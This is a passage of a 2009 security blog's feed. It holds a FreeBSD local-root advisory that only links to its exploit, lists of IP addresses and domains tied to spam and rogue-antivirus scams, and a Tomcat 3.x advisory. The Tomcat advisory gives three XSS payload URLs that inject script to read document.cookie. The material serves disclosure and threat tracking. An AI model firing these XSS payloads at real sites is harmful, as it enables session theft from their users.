tested/affected</div><div>**********************************</div><div>FreeBSD 8.0-RELEASE *** VULNERABLE</div><div>FreeBSD 7.1-RELEASE *** VULNERABLE</div><div>FreeBSD 6.3-RELEASE *** NOT VULN</div><div>FreeBSD 4.9-RELEASE *** NOT VULN</div><div><br /></div><div><div><br /></div><div>*EXPLOIT*</div><div><a href="http://seclists.org/fulldisclosure/2009/Nov/371">http://seclists.org/fulldisclosure/2009/Nov/371</a></div><div><div><div><br /></div></div></div></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5335616297351237205?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/0/da"><img src="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/1/da"><img src="http://feedads.g.doubleclick.net/~a/e1OzQGnhWY2H2DLtyeo3T55mAj8/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/freebsd-local-r00t-zeroday.htmltag:blogger.com,1999:blog-2992238913899645252.post-35341586792239168472009-12-04T09:41:00.000-08:002009-12-04T10:07:04.512-08:002009-12-04T10:07:04.512-08:00<div>IP Address: <b>82.204.219.218</b></div><div><br /></div><div><div>*.live.smtp.ru</div><div>*.michael.smtp.ru</div><div>*.msn.live.smtp.ru</div><div>*.my-yahoo-register.smtp.ru</div><div>*.ndgcx2zh2.smtp.ru</div><div>*.olhardigital.smtp.ru</div><div>*.smtp.ru</div><div>*.system.smtp.ru</div><div>*.uk.smtp.ru</div><div>*.working.smtp.ru</div><div>2a.smtp.ru</div><div>accedipostaitalienesslttpacceso.smtp.ru</div><div>altenativo2010.smtp.ru</div><div>anjodoamor2007.smtp.ru</div><div>beatrisadoyy.smtp.ru</div><div>blog-fotos-amanda.smtp.ru</div><div>blogger1.smtp.ru</div><div>cap1.smtp.ru</div><div>cocoleg.smtp.ru</div><div>computing.system.smtp.ru</div><div>finasa.smtp.ru</div><div>ftp2.smtp.ru</div><div>hsbc.uk.smtp.ru</div><div>hussein.working.smtp.ru</div><div>kalamazu2008.smtp.ru</div><div>lembrancas.michael.smtp.ru</div><div>live.smtp.ru</div><div>michael.smtp.ru</div><div>mikle.smtp.ru</div><div>msgss.smtp.ru</div><div>msn.live.smtp.ru</div><div>my-yahoo-register.smtp.ru</div><div>ndgcx2zh2.smtp.ru</div><div>node2.mk.pochta.ru</div><div>olhardigital.smtp.ru</div><div>pozesursa1.smtp.ru</div><div>ssl1.smtp.ru</div><div>system.smtp.ru</div><div>testing.smtp.ru</div><div>uk.smtp.ru</div><div>vida.smtp.ru</div><div>working.smtp.ru</div><div>www.altenativo2010.smtp.ru</div><div>www.blog-fotos-amanda.smtp.ru</div><div>www.finasa.smtp.ru</div><div>www.hsbc.uk.smtp.ru</div><div>www.msn.live.smtp.ru</div><div>www.my-yahoo-register.smtp.ru</div><div>www.ndgcx2zh2.smtp.ru</div><div>www.olhardigital.smtp.ru</div><div><br /></div><div><div>IP Address: <b>64.62.181.43</b></div><div><br /></div><div>*.fileave.com</div><div>2a.fileave.com</div><div>badkiddies.fileave.com</div><div>bandaeva.fileave.com</div><div>binuser.fileave.com</div><div>camimura.fileave.com</div><div>casinhabranca.fileave.com</div><div>contempt.fileave.com</div><div>ericschevy.fileave.com</div><div>finkel.fileave.com</div><div>googlevideo.fileave.com</div><div>gtemplates.fileave.com</div><div>ovhsux.fileave.com</div><div>scn2.fileave.com</div><div>tikam.fileave.com</div><div>trustha.fileave.com</div><div>vembebe.fileave.com</div><div>xscan.fileave.com</div><div>zenka.fileave.com</div><div>zzzz.fileave.com</div><div><br /></div><div><br /></div><div>IP Address: <b>217.116.46.139</b></div><div><br /></div><div>*.auszer.hu</div><div>*.egylap.hu</div><div>*.mail.webmester.net</div><div>*.webmester.net</div><div>auszer.hu</div><div>auto-tuning.hu</div><div>boltmix.com</div><div>csofek.hu</div><div>duoeotvos.com</div><div>egylap.hu</div><div>hirdet.info</div><div>hirdet.net</div><div>kezdo.net</div><div>kontaktspray.com</div><div>kontaktspray.hu</div><div>kpeg.hu</div><div>lakeinvest.hu</div><div>mail.auszer.hu</div><div>mail.auto-tuning.hu</div><div>mail.csofek.hu</div><div>mail.egylap.hu</div><div>mail.kemence.net</div><div>mail.kpeg.hu</div><div>mail.nevjegytar.hu</div><div>mail.oxalis.hu</div><div>mail.relaxinfra.hu</div><div>mail.rudasy.hu</div><div>mail.vicc.net</div><div>mail.webmester.net</div><div>motobatt.info</div><div>motor-akku.hu</div><div>nevjegytar.hu</div><div>ns2.webmester.net</div><div>ns3.webmester.net</div><div>oxalis.hu</div><div>proelektro.info</div><div>relaxinfra.hu</div><div>root.mail.webmester.net</div><div>root.webmester.net</div><div>rudasy.hu</div><div>tokol.net</div><div>tokoliuszoda.hu</div><div>vicc.net</div><div>webmester.net</div><div>wiha.info</div><div>www.vicc.net</div><div>www.webmester.net</div><div><br /></div><div><br /></div><div>IP Address: <b>218.93.205.19</b></div><div><br /></div><div>*.guarddog2009.com</div><div>brans.pl</div><div>dl.guarddog2009.com</div><div>guarddog2009.com</div><div>root.guarddog2009.com</div><div>www.brans.pl</div><div>www.guarddog2009.com</div><div>www.zief.pl</div><div>zief.pl</div><div><br /></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3534158679223916847?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/0/da"><img src="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/1/da"><img src="http://feedads.g.doubleclick.net/~a/rNPSp6Cjr8Keb5oyHoYG1jxFw8U/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/spam-05-dec.htmltag:blogger.com,1999:blog-2992238913899645252.post-82392184314669029392009-12-02T07:50:00.000-08:002009-12-02T07:53:02.929-08:002009-12-02T07:53:02.929-08:00Reference: <a href="http://websecurity.com.ua/3114">http://websecurity.com.ua/3114</a><div><br /></div><div>Vulnerable:</div><div><br /></div><div><div>Apache Software Foundation Tomcat 3.2.1</div><div>Apache Software Foundation Tomcat 3.2</div><div>Apache Software Foundation Tomcat 3.1.1</div><div>Apache Software Foundation Tomcat 3.1</div><div>Apache Software Foundation Tomcat 3.0</div></div><div><br /></div><div>Exploit:</div><div><pre>http://www.example.com/?offset=1&amp;cid=1&amp;limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E</pre><pre>http://www.example.com/?offset=1&amp;cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E</pre><pre>http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;cid=1</pre><pre><span class="Apple-style-span" style="font-family:Georgia, serif;"><span class="Apple-style-span" style="white-space: normal; font-size: -webkit-xxx-large;"><span class="Apple-style-span" style="font-family:monospace;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px; white-space: pre;"><span class="Apple-style-span" style="font-family: Georgia, serif; white-space: normal; font-size: 16px; "><br /></span></span></span></span></span></pre><pre><span class="Apple-style-span" style="font-family:Georgia, serif;"><span class="Apple-style-span" style="white-space: normal; font-size: -webkit-xxx-large;"><span class="Apple-style-span" style="font-family:monospace;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px; white-space: pre;"><span class="Apple-style-span" style="font-family: Georgia, serif; white-space: normal; font-size: 16px; ">Reference: <a href="http://websecurity.com.ua/3114">http://websecurity.com.ua/3114</a></span></span></span></span></span></pre></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-8239218431466902939?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/0/da"><img src="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/1/da"><img src="http://feedads.g.doubleclick.net/~a/e1aCtSourKVWGL9wETqvLhPqBPg/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/apache-tomcat-404-error-vulnerability.htmltag:blogger.com,1999:blog-2992238913899645252.post-25798197626621206942009-11-27T06:16:00.000-08:002009-11-27T06:18:39.441-08:002009-11-27T06:18:39.441-08:00<div>IP Address: <b>91.207.116.55</b></div><div><br /></div><div>10-open-davinci.com</div><div>advanced-virus-remover2010.com</div><div>advanced-virusremover-2009.com</div><div>advanced-virusremover-2010.com</div><div>advancedvirus-remover-2010.com</div><div>advancedvirusremover-2009.com</div><div>best-scan-pc.biz</div><div>best-scan-pc.com</div><div>best-scan-pc.net</div><div>best-scan.com</div><div>best-scan.net</div><div>best-scanpc.com</div><div>best-scanpc.net</div><div>best-scanpc.org</div><div>cathrynzfunz.com</div><div>coolcount1.com</div><div>downloadavr6.com</div><div>downloadavr7.com</div><div>downloadavr8.com</div><div>greatcrypt.com</div><div>hard-xxx-tube.com</div><div>mail.10-open-davinci.com</div><div>mail.advanced-virus-remover-2009.com</div><div>mail.advanced-virus-remover2010.com</div><div>mail.advanced-virusremover-2010.com</div><div>mail.advanced-virusremover2009.com</div><div>mail.advancedvirus-remover-2010.com</div><div>mail.advancedvirusremover-2009.com</div><div>mail.best-scan-pc.com</div><div>mail.best-scan-pc.net</div><div>mail.best-scan.com</div><div>mail.best-scan.net</div><div>mail.best-scanpc.org</div><div>mail.cathrynzfunz.com</div><div>mail.coolcount1.com</div><div>mail.downloadavr6.com</div><div>mail.downloadavr7.com</div><div>mail.downloadavr8.com</div><div>mail.greatcrypt.com</div><div>mail.hard-xxx-tube.com</div><div>mail.testavrdown.com</div><div>mail.testavrdownnew.com</div><div>mail.vscodec-pro.net</div><div>mail.vsproject.net</div><div>mail.xxx-white-tube.net</div><div>mail.xxx-white-tube.org</div><div>testavrdown.com</div><div>testavrdownnew.com</div><div>vscodec-pro.net</div><div>white-xxx-tube.com</div><div>www.advancedvirus-remover2009.com</div><div>www.advancedvirusremover-2009.com</div><div>www.best-scan-pc.com</div><div>www.best-scanpc.net</div><div>www.best-scanpc.org</div><div>www.hard-xxx-tube.com</div><div>www.onlinescanxppro.com</div><div>xxx-white-tube.org</div><div><br /></div><div><br /></div><div>IP Address: <b>87.98.254.201</b></div><div><br /></div><div>fastzonescan-now.com</div><div>systemprotection-zone.com</div><div><br /></div><div>IP Address: <b>88.198.239.161</b></div><div><br /></div><div>my-protectedzone.net</div><div>static.88-198-239-161.clients.your-server.de</div><div>todozone-guard.com</div><div><br /></div><div><br /></div><div>IP Address: <b>93.174.95.135</b></div><div><br /></div><div>experimentalways.com</div><div>handutilities.com</div><div>mail.experimentalways.com</div><div>mail.handutilities.com</div><div>mail.toolsand.com</div><div>mail.yourtoolscheap.com</div><div>ns1.handutilities.com</div><div>thesecurityutility.net</div><div>toolsand.com</div><div>www.dvdprotools.com</div><div>www.onlineworldcar.com</div><div>www.onlineworldtech.com</div><div>www.toolsand.com</div><div>www.yourtoolscheap.com</div><div>yourtoolscheap.com</div><div><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2579819762662120694?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/0/da"><img src="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/1/da"><img src="http://feedads.g.doubleclick.net/~a/KrGt6gNw0pqijLBg9XTKCyK8AIA/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/11/rogue-antivirus-27-nov.html